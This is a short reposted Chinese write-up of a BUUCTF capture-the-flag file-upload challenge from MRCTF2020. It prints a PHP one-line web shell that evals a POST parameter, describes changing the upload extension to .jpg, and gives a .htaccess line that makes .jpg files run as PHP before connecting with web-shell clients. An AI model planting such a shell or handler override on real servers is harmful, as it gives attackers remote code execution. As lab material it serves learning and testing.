BUU [MRCTF2020]你传你🐎呢

本文转载自查看原文 2020-04-24 15:17 1756 BUU部分刷题记录

打开题目是一道传马的题，那就传~

<?php @eval($_POST['cmd']) ?>

上传文件1.php,传一句话木马，发现失败了，抓包时改包后缀名为.jpg,上传成功！

需要注意的是，这里的原来的.php无法被解析，需要把再上传一个文件.htaccess文件，将.jpg解析成.php

再次上传文件1.htaccess

AddType application/x-httpd-php .jpg

菜刀/蚁剑连接即可

(两次上传顺序都试了下，应该都可以)

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 buu [MRCTF2020]keyboard [MRCTF2020]Ezaudit [MRCTF2020]PYWebsite 【Buuctf】[MRCTF2020]你传你🐎呢 WriteUp BUUCTF--[MRCTF2020]Transform [BUUCTF题解][MRCTF2020]Ezpop 1 MRCTF 2020 WP MRCTF 2020-“TiKi小组” 2020/5/17 BUU_[BJDCTF2020]easy BUU-rsa